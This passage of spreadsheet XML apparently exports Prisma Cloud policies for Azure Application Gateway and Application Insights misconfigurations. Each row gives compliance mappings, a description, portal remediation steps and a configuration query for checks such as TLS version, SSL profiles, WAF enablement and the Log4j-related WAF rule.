      <c r="O2212" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2212" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2212" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2212" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2212" t="inlineStr"/>
      <c r="T2212" t="b">
        <v>0</v>
      </c>
      <c r="U2212" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2212" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="W2212" t="inlineStr">
        <is>
          <t>This policy identifies the Application Gateway instances that are configured to use TLS versions 1.1 or lower as the minimum protocol version. The Application Gateway supports SSL encryption using multiple TLS versions and by default, it supports TLS version 1.0 as the minimum version. As a best practice set the minimum protocol version to TLSv1.2 or more (if you use custom SSL policy) or use the predefined policy use policy which has support TLSv1.2 or more.
For more details:
https://docs.microsoft.com/en-us/azure/application-gateway/application-gateway-ssl-policy-overview</t>
        </is>
      </c>
      <c r="X2212" t="inlineStr">
        <is>
          <t>To set the SSL policy with TLSv1.2 or more, refer below URL:
https://docs.microsoft.com/en-us/azure/application-gateway/application-gateway-configure-listener-specific-ssl-policy 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-218
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-218</t>
        </is>
      </c>
      <c r="Y2212" t="inlineStr"/>
      <c r="Z2212" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-application-gateway' AND json.rule = (['properties.sslPolicy'] does not exist and ['properties.defaultPredefinedSslPolicy'] does not equal ignore case AppGwSslPolicy20220101) or (['properties.sslPolicy'].['policyType'] equal ignore case Predefined and (['properties.sslPolicy'].['policyName'] equal ignore case AppGwSslPolicy20150501 or ['properties.sslPolicy'].['policyName'] equal ignore case AppGwSslPolicy20170401)) or (['properties.sslPolicy'].['policyType'] equal ignore case Custom and (['properties.sslPolicy'].['minProtocolVersion'] equal ignore case TLSv1_0 or ['properties.sslPolicy'].['minProtocolVersion'] equal ignore case TLSv1_1))
{"category":"General","resourceTypes":["azurerm_application_gateway"]}</t>
        </is>
      </c>
      <c r="AA2212" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2212" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2212" t="inlineStr">
        <is>
          <t>PC-AZR-AGW-326-CKV_AZURE_218</t>
        </is>
      </c>
      <c r="AD2212" t="b">
        <v>1</v>
      </c>
      <c r="AE2212" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2212" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>8bf20934-38d6-419e-9e0e-b0c7b0c1d238</t>
        </is>
      </c>
      <c r="AI2212" t="inlineStr">
        <is>
          <t>9aaa2409-fdc4-4a85-af2d-8b2613a57fb4</t>
        </is>
      </c>
      <c r="AJ2212" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2212" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2213">
      <c r="A2213" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, HITRUST CSF v.11.2.0</t>
        </is>
      </c>
      <c r="B2213" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2213" s="2" t="inlineStr"/>
      <c r="D2213" t="inlineStr"/>
      <c r="E2213" t="inlineStr"/>
      <c r="F2213" t="inlineStr"/>
      <c r="G2213" t="b">
        <v>1</v>
      </c>
      <c r="H22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13" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2213" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="K2213" t="inlineStr">
        <is>
          <t>Azure Application Gateway listener not secured with SSL profile</t>
        </is>
      </c>
      <c r="L2213" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2213" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2213" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2213" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2213" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2213" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R2213" t="inlineStr">
        <is>
          <t>01.n - Network Connection Control</t>
        </is>
      </c>
      <c r="S2213" t="inlineStr"/>
      <c r="T2213" t="b">
        <v>0</v>
      </c>
      <c r="U2213" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2213" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="W2213" t="inlineStr">
        <is>
          <t>This policy identifies Azure Application Gateway listeners that are not secured with an SSL profile.
An SSL profile provides a secure channel by encrypting the data transferred between the client and the application gateway. Without SSL profiles, the data transferred is vulnerable to interception, posing security risks. This could lead to potential data breaches and compromise sensitive information.
As a security best practice, it is recommended to secure all Application Gateway listeners with SSL profiles. This ensures data confidentiality and integrity by encrypting traffic.</t>
        </is>
      </c>
      <c r="X2213" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal and search for 'Application gateways'.
2. Select 'Application gateways'.
3. Click on reported Application gateway.
4. Under 'Settings' select 'Listeners' from the left-side menu.
5. Select the HTTPS listener.
6. Check the 'Enable SSL Profile' box.
7. Select the SSL profile you created (e.g., applicationGatewaySSLProfile) from the dropdown. If no profile exists, you'll need to create one first.
8. Finish configuring the listener as needed.
9. Click 'Add' to save the listener with the SSL profile.</t>
        </is>
      </c>
      <c r="Y2213" t="inlineStr"/>
      <c r="Z2213" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-application-gateway' AND json.rule = ['properties.provisioningState'] equal ignore case Succeeded AND ['properties.httpListeners'][*].['properties.provisioningState'] equal ignore case Succeeded AND ['properties.httpListeners'][*].['properties.protocol'] equal ignore case Https AND ['properties.httpListeners'][*].['properties.sslProfile'].['id'] does not exist</t>
        </is>
      </c>
      <c r="AA2213" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2213" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2213" t="inlineStr">
        <is>
          <t>PC-AZR-AGW-1275</t>
        </is>
      </c>
      <c r="AD2213" t="b">
        <v>1</v>
      </c>
      <c r="AE2213" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2213" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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13" t="inlineStr">
        <is>
          <t>9df8bcf5-7b46-47b4-b98f-09e0fcbd6f40</t>
        </is>
      </c>
      <c r="AI2213" t="inlineStr">
        <is>
          <t>8df8b748-4b2c-474a-9462-a6f32d4a51f0</t>
        </is>
      </c>
      <c r="AJ2213" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2213" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2214">
      <c r="A2214" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, CIS Controls v8, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.1, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, ISO/IEC 27017:2015, MITRE ATT&amp;CK v12, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, NIST CSF, New Zealand Information Security Manual (NZISM v3.4), Matt's ATT&amp;ACK, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, jneytchev-fedramp-low, CIS Controls v8.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST 800-53 Rev 5, ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), Fedramp (Low), ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CDC NIST 800-53 Rev4, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), CyberSecurity Law of the People's Republic of China, NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Fedramp (Moderate), ISO/IEC 27018:2019, CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2214" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2214" s="2" t="inlineStr"/>
      <c r="D2214" t="inlineStr"/>
      <c r="E2214" t="inlineStr"/>
      <c r="F2214" t="inlineStr"/>
      <c r="G2214" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2214" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="K2214" t="inlineStr">
        <is>
          <t>Azure Application Gateway does not have the Web application firewall (WAF) enabled</t>
        </is>
      </c>
      <c r="L2214" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2214" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2214" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2214" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2214" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2214" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2214" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2214" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2214" t="b">
        <v>0</v>
      </c>
      <c r="U2214" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2214" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="W2214" t="inlineStr">
        <is>
          <t>This policy identifies Azure Application Gateways that do not have Web application firewall (WAF) enabled. As a best practice, enable WAF to manage and protect your web applications behind the Application Gateway from common exploits and vulnerabilities.</t>
        </is>
      </c>
      <c r="X2214" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'Application gateways', and select the application gateway you need to modify
3. Select 'Web Application Firewall' under 'Settings'
4. Change the 'Tier' to 'WAF' or 'WAF V2' and 'Firewall status' to 'Enabled'
5. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y2214" t="inlineStr"/>
      <c r="Z2214" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-application-gateway' AND json.rule = (['properties.webApplicationFirewallConfiguration'] does not exist and ['properties.firewallPolicy'] does not exist) or (['properties.webApplicationFirewallConfiguration'].enabled is false and ['properties.firewallPolicy'] does not exist)</t>
        </is>
      </c>
      <c r="AA2214" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2214" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2214" t="inlineStr">
        <is>
          <t>PC-AZR-AGW-329</t>
        </is>
      </c>
      <c r="AD2214" t="b">
        <v>1</v>
      </c>
      <c r="AE2214" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2214" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>927d2db7-ae6f-4122-bc61-cdbc14c71d7d</t>
        </is>
      </c>
      <c r="AI2214" t="inlineStr">
        <is>
          <t>de2a7533-42ca-4ba6-b7cc-bd39f98ee1cd</t>
        </is>
      </c>
      <c r="AJ2214" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2214" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2215">
      <c r="A2215" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, NIST SP 800-171 Revision 3, SOC 2, NIST 800-53 Rev 5, GDPR, SOC 2, HITRUST CSF v.11.2.0</t>
        </is>
      </c>
      <c r="B2215" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2215" s="2" t="inlineStr"/>
      <c r="D2215" t="inlineStr"/>
      <c r="E2215" t="inlineStr"/>
      <c r="F2215" t="inlineStr"/>
      <c r="G2215" t="b">
        <v>1</v>
      </c>
      <c r="H22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215" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2215" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="K2215" t="inlineStr">
        <is>
          <t>Azure Application Gateway WAF policy is not enabled in prevention mode</t>
        </is>
      </c>
      <c r="L2215" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2215" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2215" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2215" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2215" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2215" t="inlineStr">
        <is>
          <t>Control Category: 11.0</t>
        </is>
      </c>
      <c r="R2215" t="inlineStr">
        <is>
          <t>11.a - Reporting Information Security Events</t>
        </is>
      </c>
      <c r="S2215" t="inlineStr"/>
      <c r="T2215" t="b">
        <v>0</v>
      </c>
      <c r="U2215" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2215" t="inlineStr">
        <is>
          <t>azure-application-gateway-waf-policy</t>
        </is>
      </c>
      <c r="W2215" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Application Gateway WAF policies that are not enabled in prevention mode.
Azure Application Gateway WAF policies support Prevention and Detection modes. Detection mode monitors and logs all threat alerts to a log file. Detection mode is useful for testing purposes and configures WAF initially but it does not provide protection. It logs the traffic, but it doesn't take any actions such as allow or deny. Where as, in Prevention mode, WAF analyzes incoming traffic to the application gateway and blocks any requests that are determined to be malicious based on a set of rules.
As a best security practice, it is recommended to enable Application Gateway WAF policies with Prevention mode to prevent malicious requests from reaching your application and potentially causing damage.</t>
        </is>
      </c>
      <c r="X2215" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to 'Web Application Firewall policies (WAF)' dashboard
3. Click on the reported WAF policy
4. In 'Overview' section, Click on 'Switch to prevention mode'.
NOTE: Define managed rule or custom rules properly as per your business requirement prior to transition to Prevention mode. This can help in unexpected blocked traffic.</t>
        </is>
      </c>
      <c r="Y2215" t="inlineStr"/>
      <c r="Z2215" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-application-gateway-waf-policy' AND json.rule = properties.applicationGateways[*].id size greater than 0 and properties.policySettings.state equal ignore case Enabled and properties.policySettings.mode does not equal ignore case Prevention</t>
        </is>
      </c>
      <c r="AA2215" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2215" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2215" t="inlineStr">
        <is>
          <t>PC-AZR-AWF-1193</t>
        </is>
      </c>
      <c r="AD2215" t="b">
        <v>1</v>
      </c>
      <c r="AE2215" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2215" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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15" t="inlineStr">
        <is>
          <t>87d7bd82-846b-4bda-9faf-bf21af2182ac</t>
        </is>
      </c>
      <c r="AI2215" t="inlineStr">
        <is>
          <t>3a4be99e-0c98-4b03-b315-9ada5cf9747f</t>
        </is>
      </c>
      <c r="AJ2215" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2215" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2216">
      <c r="A2216" t="inlineStr">
        <is>
          <t>CIS Controls v8, kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, PCI DSS v4.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, NIST SP 800-171 Revision 3, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), PCI DSS v4.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, ITSG-33, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, ISO 27002:2022, TX-RAMP Level 2, NIST 800-53 Rev 5, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, NIST CSF v2.0, CIS Controls v7.1, Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Copy of CIS Controls v8, PCI DSS v4.0, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), DORA, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2216" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2216" s="2" t="inlineStr"/>
      <c r="D2216" t="inlineStr"/>
      <c r="E2216" t="inlineStr"/>
      <c r="F2216" t="inlineStr"/>
      <c r="G2216" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2216" t="inlineStr">
        <is>
          <t>azure-application-gateway</t>
        </is>
      </c>
      <c r="K2216" t="inlineStr">
        <is>
          <t>Azure Application Gateway Web application firewall (WAF) policy rule for Remote Command Execution is disabled</t>
        </is>
      </c>
      <c r="L2216" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2216" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2216" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2216" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2216" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2216" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2216" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2216" t="inlineStr"/>
      <c r="T2216" t="b">
        <v>0</v>
      </c>
      <c r="U2216" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2216" t="inlineStr">
        <is>
          <t>azure-application-gateway-waf-policy</t>
        </is>
      </c>
      <c r="W2216" t="inlineStr">
        <is>
          <t>This policy identifies Azure Application Gateway Web application firewall (WAF) policies that have the Remote Command Execution rule disabled. It is recommended to define the criteria in the WAF policy with the rule ‘Remote Command Execution (944240)’ under managed rules to help in detecting and mitigating Log4j vulnerability. 
For details:
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/</t>
        </is>
      </c>
      <c r="X2216" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'All services' &gt; 'Web Application Firewall policies (WAF)'
3. Click on the reported Web Application Firewall policies (WAF) policy
4. Click on the 'Managed rules' from the left panel
5. Search for '944240' in Managed rule sets  and Select rule
6. Click on the 'Enable' to enable rule
7. Click on 'Save' to save your changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-application-gateway-waf-prevents-message-lookup-in-log4j2</t>
        </is>
      </c>
      <c r="Y2216" t="inlineStr"/>
      <c r="Z2216" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-application-gateway-waf-policy' AND json.rule = properties.policySettings.state equals Enabled and properties.managedRules.managedRuleSets is not empty and properties.managedRules.managedRuleSets[*].ruleGroupOverrides[*].rules[?any(ruleId equals 944240 and state equals Disabled)] exists and properties.applicationGateways[*] is not empty
{"category":"Networking","resourceTypes":["azurerm_web_application_firewall_policy"]}</t>
        </is>
      </c>
      <c r="AA2216" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2216" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2216" t="inlineStr">
        <is>
          <t>PC-AZR-AWF-831-CKV_AZURE_135</t>
        </is>
      </c>
      <c r="AD2216" t="b">
        <v>1</v>
      </c>
      <c r="AE2216" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2216" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>0550cb51-be87-48c6-af1a-2bd1f91b8d91</t>
        </is>
      </c>
      <c r="AI2216" t="inlineStr">
        <is>
          <t>856f4105-7c71-48b1-87ac-e9a8175d2e3e</t>
        </is>
      </c>
      <c r="AJ2216" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2216" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2217">
      <c r="A2217" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2217" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2217" s="2" t="inlineStr"/>
      <c r="D2217" t="inlineStr"/>
      <c r="E2217" t="inlineStr"/>
      <c r="F2217" t="inlineStr"/>
      <c r="G2217" t="b">
        <v>0</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2217" t="inlineStr">
        <is>
          <t>azure-application-insights</t>
        </is>
      </c>
      <c r="K2217" t="inlineStr">
        <is>
          <t>Azure Application Insights configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2217" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2217" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2217" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2217" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2217" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2217" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R2217" t="inlineStr">
        <is>
          <t>CM-07-00 : Least Functionality</t>
        </is>
      </c>
      <c r="S2217" t="inlineStr"/>
      <c r="T2217" t="b">
        <v>0</v>
      </c>
      <c r="U2217" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2217" t="inlineStr">
        <is>
          <t>azure-application-insights-component</t>
        </is>
      </c>
      <c r="W2217" t="inlineStr">
        <is>
          <t>This policy identifies Application Insights configured with overly permissive network access.
Virtual network access configuration in Application Insights allows you to restrict data ingestion and queries coming from  public networks.
It is recommended to configure the Application Insights with virtual networks access configuration set to restrict, so that the Application Insight is accessible only to restricted Azure Monitor Private Link Scopes.</t>
        </is>
      </c>
      <c r="X2217" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Application Insights dashboard 
3. Click on the reported Application Insights
4. Under the 'Configure' menu, click on 'Network Isolation'
5. Create a Azure Monitor Private Link Scope if it is not already created by referring:
https://docs.microsoft.com/en-us/azure/azure-monitor/logs/private-link-configure#create-an-azure-monitor-private-link-scope
6. After creating, Under 'Virtual networks access configuration', 
Set 'Accept data ingestion from public networks not connected through a Private Link Scope' to 'No' and 
Set 'Accept queries from public networks not connected through a Private Link Scope' to 'No'
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2217" t="inlineStr"/>
      <c r="Z2217" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-application-insights-component' AND json.rule = properties.provisioningState equals Succeeded and (properties.publicNetworkAccessForQuery equals Enabled or properties.publicNetworkAccessForIngestion equals Enabled)</t>
        </is>
      </c>
      <c r="AA2217" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2217" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2217" t="inlineStr">
        <is>
          <t>PC-AZR-AAI-849</t>
        </is>
      </c>
      <c r="AD2217" t="b">
        <v>1</v>
      </c>
      <c r="AE2217" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2217" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>d7a61b2d-8160-40cd-8f6a-5f8cd98229db</t>
        </is>
      </c>
      <c r="AI2217" t="inlineStr">
        <is>
          <t>86ee9a9b-b674-4ed7-994d-6ab99cab11f0</t>
        </is>
      </c>
      <c r="AJ2217" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2217" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2218">
      <c r="A2218" t="inlineStr">
        <is>
